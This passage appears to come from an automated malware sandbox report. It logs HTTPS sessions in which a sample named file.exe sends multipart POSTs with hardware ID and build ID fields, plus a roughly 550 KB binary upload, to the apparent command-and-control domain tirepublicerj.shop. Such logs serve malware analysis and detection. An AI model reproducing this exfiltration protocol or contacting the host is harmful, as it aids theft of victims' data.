                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-04 21:58:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449742104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:12 UTC279OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=0HSGNRLJRUP0I
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 20402
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:12 UTC15331OUTData Raw: 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 30 48 53 47 4e 52 4c 4a 52 55 50 30 49 0d 0a 43
                                                      Data Ascii: --0HSGNRLJRUP0IContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--0HSGNRLJRUP0IContent-Disposition: form-data; name="pid"3--0HSGNRLJRUP0IContent-Disposition: form-data; name="lid"XpLY32----0HSGNRLJRUP0IC
                                                      2025-01-04 21:58:12 UTC5071OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Data Ascii: lrQMn 64F6(X&7~`aO
                                                      2025-01-04 21:58:13 UTC1135INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:13 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=89pe139p859a0970qf2427b7cp; expires=Wed, 30 Apr 2025 15:44:52 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjuxYcre2tcuehYxNGCpR0tZ8XMx%2BG3loSUCdnzxv7C3Ia3Rx%2BKswcZtmbgQ0c7UkwgDNim43OUxjF8fIY6Ju5jZNqLZvfHNSvJGzJVpQ7zT%2FASJXQ0Jbq%2B3JuWvcuvw3%2BAmxMk%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d19dc7c8ca1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1994&rtt_var=753&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21361&delivery_rate=1447694&cwnd=168&unsent_bytes=0&cid=6b323bcd998c86a9&ts=620&x=0"
                                                      2025-01-04 21:58:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-04 21:58:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.449744104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:14 UTC280OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=Y50MEZKPLS8CSHAP
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 976
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:14 UTC976OUTData Raw: 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 35 30 4d 45 5a 4b 50 4c 53 38 43 53 48 41 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a 2d 2d 59 35 30 4d 45 5a 4b
                                                      Data Ascii: --Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="pid"1--Y50MEZKPLS8CSHAPContent-Disposition: form-data; name="lid"XpLY32----Y50MEZK
                                                      2025-01-04 21:58:14 UTC1132INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=ajn3ooju03eg5nuvbciu3kuvcq; expires=Wed, 30 Apr 2025 15:44:53 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFM%2F1aJAcyKpBY4iExFU%2BVR2qVeLlOf51Tp0xW%2BBVxFnRJBMv%2FRI%2BHc4XhMOItu2qsiFK59SyiaDsovlV7tbEmWpolqzOf2oTzsqFPQqtERfvHR49RPivgqw7XBxcdW2el1HvFc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d220da18ca1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2001&rtt_var=781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1892&delivery_rate=1459270&cwnd=168&unsent_bytes=0&cid=608f2560eff76d50&ts=479&x=0"
                                                      2025-01-04 21:58:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-04 21:58:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.449745104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:15 UTC286OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=GB16ICI9CGD0FDQ47JL
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 550376
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 42 31 36 49 43 49 39 43 47 44 30 46 44 51 34 37 4a 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 58 70 4c 59 33 32 2d 2d 0d 0a
                                                      Data Ascii: --GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="hwid"A0CAAC5595236522822D1F4978021086--GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="pid"1--GB16ICI9CGD0FDQ47JLContent-Disposition: form-data; name="lid"XpLY32--
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 50 82 7f 3f 3b 44 9e 65 d2 fe 81 be f5 8f d3 e8 aa fd b0 11 99 91 89 28 c5 e5 83 d3 79 4b c0 7f 17 4d 13 1b c4 0f a6 7a d1 ac 8d 00 4a f8 a1 78 ce 55 3d 44 76 d5 c5 96 3f 51 4b db ac 0f 6b 35 db 28 fc b5 f0 36 f9 20 3a 01 b5 f9 6e 5b ca 49 06 81 ec c1 7e fc c4 f2 98 b6 f1 12 64 d2 8a 04 4f 91 55 63 8e 02 fa dc ec 51 62 51 12 e2 13 d3 1b 0f 31 cd 27 eb 37 b4 93 be 73 d4 b2 2b a3 43 52 21 0b 3c 59 3e 32 1a 9e 46 1d bd 6d 51 b9 a1 82 a2 96 82 e2 35 7a 5f cb aa 3a 12 e0 a7 62 09 b6 a0 c1 60 34 c0 71 f6 8b ff 9f 8a 64 f9 18 5d 74 eb 27 f0 e3 63 58 b4 bf 0a 9b 5c 8a b6 58 6a d6 c1 03 a8 d3 6a be 4a 94 98 6a 6e df f2 35 33 53 32 7a cf 8e 76 42 91 3f 57 84 e9 a2 45 a6 d4 44 1a 62 23 12 00 39 bb b2 97 7c fc 8d ad 76 fb c8 b1 52 fc 95 e5 07 21 93 92 ed e5 92 ac 18
                                                      Data Ascii: P?;De(yKMzJxU=Dv?QKk5(6 :n[I~dOUcQbQ1'7s+CR!<Y>2FmQ5z_:b`4qd]t'cX\XjjJjn53S2zvB?WEDb#9|vR!
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 85 ae 44 64 8e c5 11 71 75 a4 31 e1 5f 55 e1 a2 d1 d8 b8 a8 83 6a de 56 76 d1 39 5e 7b 3a 4d 67 90 6b 43 c6 93 6a 61 7a e6 08 46 53 ba 55 3d c7 e8 da b6 f3 d2 97 3b 26 9d 34 60 ed b3 54 22 28 12 7b 8f 16 88 02 6d a0 fa 3c 3c 4c 75 83 4a 50 04 24 b1 57 24 74 3b cc 1c 7a 6f 47 30 3e 97 e8 0f 2f a6 7c 0e 4e 74 bc ff 92 5d fa fe e3 8c db db 85 57 72 9b c6 03 8f 07 97 f8 a9 e5 37 a9 b4 4f 8c 42 fe d2 dd d3 fe 1e fb 04 50 21 b2 54 63 fa 56 83 bb dd 19 45 10 5a 92 15 9c 14 7a 40 af 90 37 f6 48 f7 fd b4 a8 4a 64 44 34 9d 1f c4 5f 1c ad 52 81 da 1a 0a b1 41 c1 5e 13 d8 75 7f bd 33 c9 89 26 62 ca c8 60 f3 63 de 51 91 c9 6f a6 26 e0 ce 48 0a 4a 7e 89 7e 3f 87 80 ca e9 a5 69 72 be 36 73 5c 36 1a da 40 7d 1f 77 4e 5b cb 39 59 95 bc bf b5 84 4f 4c e6 56 3a bb 80 1a 40
                                                      Data Ascii: Ddqu1_UjVv9^{:MgkCjazFSU=;&4`T"({m<<LuJP$W$t;zoG0>/|Nt]Wr7OBP!TcVEZz@7HJdD4_RA^u3&b`cQo&HJ~~?ir6s\6@}wN[9YOLV:@
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: fb b1 50 0c 24 fe 33 83 df 8b 14 74 f8 33 cc 54 6b 1c de c9 72 f5 30 7d 5f ff aa cb f8 ef ac c1 ca 7e dc 42 ba a7 0c 78 db 86 1a c0 83 da 59 89 5b a8 b1 35 4d 2c 7c b0 e2 1e 60 94 46 c9 33 89 88 56 b6 22 27 60 71 69 e1 15 43 18 56 cc 48 0d 0f 14 cf 63 2a b9 fa 4a 24 f9 81 33 8a dc 82 9f 19 74 fb 6c 3b 54 95 d4 b0 73 53 76 92 41 b0 da b2 47 69 83 50 f7 cf ff 2c 2b 4b 9f 78 60 c2 fe 45 d0 f5 67 c4 f7 d2 c1 ac 1a 88 83 c4 e7 f7 23 93 bf b0 27 1e a1 c8 b9 46 95 c1 87 96 a6 7a 2f bb bc bd f8 bc a0 8c f7 f3 9d cb 57 4b 62 0c d9 f1 8f 29 b2 ed a2 f7 95 c6 b9 de 4e b7 1a 93 c9 c6 da 58 88 e3 e9 1d 5b 86 92 f9 bc 55 da e2 36 a3 1b 6f 6a ac 81 0a 3a 29 69 d1 a8 e0 06 84 51 ae 57 89 11 3a 61 d2 ab 9f 0a 92 92 93 3e 38 97 97 74 09 e8 93 9e a3 9b f6 52 22 c9 24 99 b6
                                                      Data Ascii: P$3t3Tkr0}_~BxY[5M,|`F3V"'`qiCVHc*J$3tl;TsSvAGiP,+Kx`Eg#'Fz/WKb)NX[U6oj:)iQW:a>8tR"$
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 08 99 b3 b8 dc f8 ee 02 67 bd 80 28 91 56 17 41 69 03 52 98 16 17 35 6b 7c af 74 90 da b3 b0 53 23 1f 7e 71 33 07 46 ab b0 a1 09 cc 7a f5 a9 ca c3 27 74 03 de 4b a4 7f ee d2 de c7 b5 77 de 48 0a ff a2 3a 85 53 f2 d5 71 91 ef da 51 c9 65 c8 fb 8b f4 60 a4 62 b7 c2 15 37 e8 88 f0 fd 83 2e 2e db df 1f 59 39 14 fa 70 0d 56 6a b3 8a 80 a9 63 d8 7d d6 c7 95 28 a2 4d b7 a7 6f ca bc 86 b4 e7 e5 7a d6 67 8d d6 bb f3 ad 71 35 df 7b 3d 06 42 47 8b 24 b5 d3 e4 d1 b4 c2 f3 e5 5b 17 e2 b4 32 04 4a 63 6f 25 1d 9b 0b 6a 78 fa 6e 50 3a 2f e1 0c e1 4f 65 e3 ec be f1 8f e4 64 9a 75 56 cd 0d ce bf eb 19 c3 6f 3c 8e 1c 76 01 e4 5a 63 60 68 5c 5d 3c 22 28 82 1e fb c4 4e 2c ff e7 33 3c 79 c1 e1 b3 c2 75 e1 3b 60 0b 3f 6d 37 93 09 f2 d7 ba fa 07 0d 86 89 72 91 a5 38 d9 fa d6 9c
                                                      Data Ascii: g(VAiR5k|tS#~q3Fz'tKwH:SqQe`b7..Y9pVjc}(Mozgq5{=BG$[2Jco%jxnP:/OeduVo<vZc`h\]<"(N,3<yu;`?m7r8
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 56 e7 0a 14 9f d9 2f ba 7b bd 23 98 17 1a 16 fe ad eb 10 2e 0e 8c a9 a8 b2 ca b3 18 b8 c2 16 e1 21 c4 ac aa a7 13 37 de 5e 90 18 9a 77 88 b8 6d 06 d1 42 8b f3 8c ec 51 c6 3b 55 c1 1d 57 08 85 e9 1a fa d4 92 76 79 03 f7 2c 5c 51 bf f5 fe b0 7c 1f 6c 8e 69 db df 59 27 3d 18 06 82 a8 2c 6f c1 6e 82 e8 59 82 45 b6 82 cc 9d 8d 43 99 97 66 8b c4 04 e6 36 4a 6f f0 70 52 7d d4 b8 82 a8 5c 17 d7 cd 2f 80 1c 1f d4 ea 53 82 e0 25 cf 27 80 c0 7c da e0 0c ca 3a 87 1b 0d 40 d9 53 65 5e 48 fb 84 5c 30 1c e4 0e 35 94 89 47 11 e6 ae 7e 25 fd b0 50 4f bd 13 1d 2b 60 fa 1a 10 86 da 94 0b 38 e7 79 16 c1 b8 f1 29 c7 98 88 29 01 64 5a 57 59 ee cb 7c 9c 48 60 c5 8c 71 ae b1 24 bd 1d 65 36 b0 eb 1d 76 05 c5 68 1f 39 b7 82 3c 60 e3 86 3a 8d 09 c2 04 f0 4c e2 a7 8e f2 78 ca dd e6
                                                      Data Ascii: V/{#.!7^wmBQ;UWvy,\Q|liY'=,onYECf6JopR}\/S%'|:@Se^H\05G~%PO+`8y))dZWY|H`q$e6vh9<`:Lx
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: c8 ec 91 7e 6e 17 3d 47 bc 9b 12 b9 61 9d 6f fa d6 ee 2a 44 b3 c0 75 3f 85 18 b4 d8 9e dd 7e 2c 7f d5 17 ef ca fd 6c c0 0d 56 a9 f1 02 5f 38 70 94 60 1b 87 fb 33 13 18 12 9d fc 72 5c ff af 51 a7 8c 38 08 9d 6c bc f8 50 e7 c2 b9 25 7f ac f2 b6 e5 6f 99 d8 3f 45 66 a8 55 b1 57 fe 13 c8 77 26 42 2e 7b 3f fc ba e0 b2 b7 e9 a8 50 25 2f 9c 8b 53 39 ea 66 88 3c e9 f8 67 84 24 c0 b5 10 6c a7 03 49 6b cf 7f c1 37 9e ca 4c 17 30 e6 65 16 0f fd 9e e2 39 a4 d3 91 8c 08 91 60 cb a6 7b f8 fd bf f9 69 37 76 6f 8a 53 47 78 ba ad b5 7e 42 84 c9 ae ec c3 e7 4b 40 77 ce 3f 79 2e d9 b3 f2 51 06 70 d8 2a de a5 04 a4 dd 9f 38 23 43 dc e1 14 d7 30 51 20 cc 3c 1b f6 bf c6 08 3a ff ee e1 af bc ef d2 12 e6 8f 9b fc 90 30 72 a9 0a 28 78 0b 5f e7 1b 28 86 c0 39 c0 f1 4f ad 95 28 19
                                                      Data Ascii: ~n=Gao*Du?~,lV_8p`3r\Q8lP%o?EfUWw&B.{?P%/S9f<g$lIk7L0e9`{i7voSGx~BK@w?y.Qp*8#C0Q <:0r(x_(9O(
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 27 50 9a b2 ec 62 82 d7 43 71 2f 49 08 f5 49 f8 f9 81 68 c6 02 4c a7 28 93 93 43 ef 25 21 be 23 db 37 c9 c1 29 04 a6 d8 14 7a 2a 05 77 37 05 5f 03 fc b9 d2 04 4b 53 6d ac bf 18 c6 68 76 c3 f1 96 b2 a4 f7 9b 76 d7 61 83 13 29 0f 95 6c 1c 62 82 0e 63 bb 0a 2e c7 ba e5 25 56 6d ef 9e 58 76 fc 81 b4 37 9c 7d ec 27 6f 85 bb 25 4e 40 c4 dc 99 72 c1 e3 2e e8 3c 68 0b d3 5d 4d fd 4a 51 dd e9 6e 2f 29 fe f4 84 1c e6 65 77 e2 60 61 44 12 d7 5b 53 0e f5 57 6a 12 13 7e d3 c4 ba cf 0a 31 82 f9 8f 0d 35 1b c6 45 dc dd 4e 5c b9 5c d8 56 1d ad ca ec be e8 52 5b b2 0a 29 3c 8e 35 43 e5 dd 59 e8 3b ad 6a 2f 4b ec 53 48 34 4c 46 da 09 36 28 78 e0 dd 79 a7 30 be 25 4a fd 66 f4 6c b1 48 f0 0d 5a 38 32 61 95 51 50 6c 14 cf 49 26 13 4e 0b af ef 61 e8 8c 27 3c 7f 45 56 94 8b e0
                                                      Data Ascii: 'PbCq/IIhL(C%!#7)z*w7_KSmhvva)lbc.%VmXv7}'o%N@r.<h]MJQn/)ew`aD[SWj~15EN\\VR[)<5CY;j/KSH4LF6(xy0%JflHZ82aQPlI&Na'<EV
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: 78 c0 53 17 77 bf d2 7f 3a 80 4a c2 16 89 d2 2c f7 20 8b e6 83 2c 13 e8 37 fd 70 80 38 5d 31 6a df 59 b5 c6 77 77 33 e2 6b 75 94 14 33 78 fe 78 77 60 a2 1d 20 eb 21 c4 11 bf a4 c3 1f 49 44 8b 35 9b c9 2c ac 4b 4d 44 e7 e0 89 f8 df 67 49 f7 d8 8e 01 19 c5 48 b5 11 65 f5 6d 17 3e 9e 18 62 6c 6d a9 39 b7 5f 4b 3b 32 0c 15 1c d8 60 dc cd c7 af 14 41 72 ae d3 3f 5b a7 bb 7d 39 47 83 be 96 2b 54 e3 7f 29 23 4d c3 09 af 69 86 5f 18 17 fb 58 08 fc ee 67 cc 8a f3 9b de 28 51 0c 4f 33 33 49 0c 1b af 7a 6c 11 b1 9a 4b 78 30 b8 ad af ce af 0b db 85 1a 52 b0 c1 13 e3 19 f8 5a e3 70 c5 15 22 4c ca 85 04 4f ca c8 16 1f 54 4a 91 cf 6e 35 15 e0 e3 5b de bb ab c5 7e b7 7c 94 ba 44 c7 32 45 a5 45 b6 45 29 3d 9a e7 4c c1 34 75 4e bb 34 3c c9 bf 8d a9 2c d5 a9 e3 2b 2e da 25
                                                      Data Ascii: xSw:J, ,7p8]1jYww3ku3xxw` !ID5,KMDgIHem>blm9_K;2`Ar?[}9G+T)#Mi_Xg(QO33IzlKx0RZp"LOTJn5[~|D2EEE)=L4uN4<,+.%
                                                      2025-01-04 21:58:15 UTC15331OUTData Raw: c5 3c 3f b0 ad 14 99 34 4d 35 bf bb c1 79 6e b4 2b e4 df 4b 78 a4 ee 18 31 41 b3 e6 98 c3 35 96 47 db fe 2f 66 55 4a 3e 50 35 86 b0 7c 6d 0b 98 fe 78 e0 42 19 a0 bf bf aa 0e 0a 18 3d bd e6 80 d2 fb 4f fc 7e 77 75 56 e1 71 fa 7b 40 16 60 19 a0 c3 fc 5b 29 3f 8f 92 a3 43 67 60 ca 5b e3 52 5e f5 87 b3 97 80 8e 1f 8c cd d9 33 15 9f 47 f2 04 c2 53 98 cd 63 9d 82 52 bb c0 cb b7 8a 4b dc 15 c1 df e5 9f d6 f1 08 76 21 20 e4 91 04 a0 a2 7d f6 90 e2 8b 2a 7e f6 5e 44 ca 9d 35 51 d4 79 c5 59 b2 4a fd 1d e3 94 9c 8c f7 92 85 eb 46 9d 85 20 21 23 9e 18 cf 8c ff 9d 96 b7 05 4c e6 92 cb 56 4f 19 ac c4 0b 93 73 e3 c3 58 2b 90 e8 2d 7d d8 17 b7 66 6c c0 22 f6 21 ff 42 82 fb 3f 07 fb 88 70 2e d2 db eb fe 1d ee c6 a2 09 81 b5 fd 10 cb 54 79 e7 c0 96 0c 45 de 9e cc 68 b8 c1
                                                      Data Ascii: <?4M5yn+Kx1A5G/fUJ>P5|mxB=O~wuVq{@`[)?Cg`[R^3GScRKv! }*~^D5QyYJF !#LVOsX+-}fl"!B?p.TyEh
                                                      2025-01-04 21:58:16 UTC1133INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:16 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=ag9f4rng2kum6dn6surmo5benv; expires=Wed, 30 Apr 2025 15:44:55 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asKyvq%2FP%2Br8yWlLQVafL8GU0LSwg5iavBbEI2NO2bZgPi04aXrimpRNruqioV6Dy9DvXJ8nNdUw9LivhYWthTAKXqGgiGgP0s13jtOQ9i9hpBwgaRcOUY6llgfLkoIGUxZsTzPI%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d2a3f088ca1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1942&rtt_var=740&sent=319&recv=575&lost=0&retrans=0&sent_bytes=2845&recv_bytes=552860&delivery_rate=1466599&cwnd=168&unsent_bytes=0&cid=322ba32cd702dff3&ts=1530&x=0"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.449746104.21.64.14436664C:\Users\user\Desktop\file.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-04 21:58:17 UTC266OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 77
                                                      Host: tirepublicerj.shop
                                                      2025-01-04 21:58:17 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 58 70 4c 59 33 32 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 30 43 41 41 43 35 35 39 35 32 33 36 35 32 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36
                                                      Data Ascii: act=get_message&ver=4.0&lid=XpLY32--&j=&hwid=A0CAAC5595236522822D1F4978021086
                                                      2025-01-04 21:58:17 UTC1127INHTTP/1.1 200 OK
                                                      Date: Sat, 04 Jan 2025 21:58:17 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=arlin49ofpcddmv39ti4kl55gn; expires=Wed, 30 Apr 2025 15:44:56 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FEwUEQsVbRPbAvRgvFdCqTx9yieYOciKZu5qEIUqbd9t9rh1%2B2mRgQocpzmTJxBVWnk3kjfCxzCSbkWkVhITP%2FEX8HrKy1943%2BToD4ZQhj52U1RPahhGxQY7nCiylQPv0gZ1AWM%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fce7d36fd6c8ca1-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1933&min_rtt=1931&rtt_var=728&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=979&delivery_rate=1498204&cwnd=168&unsent_bytes=0&cid=d2766018f465cb9f&ts=465&x=0"
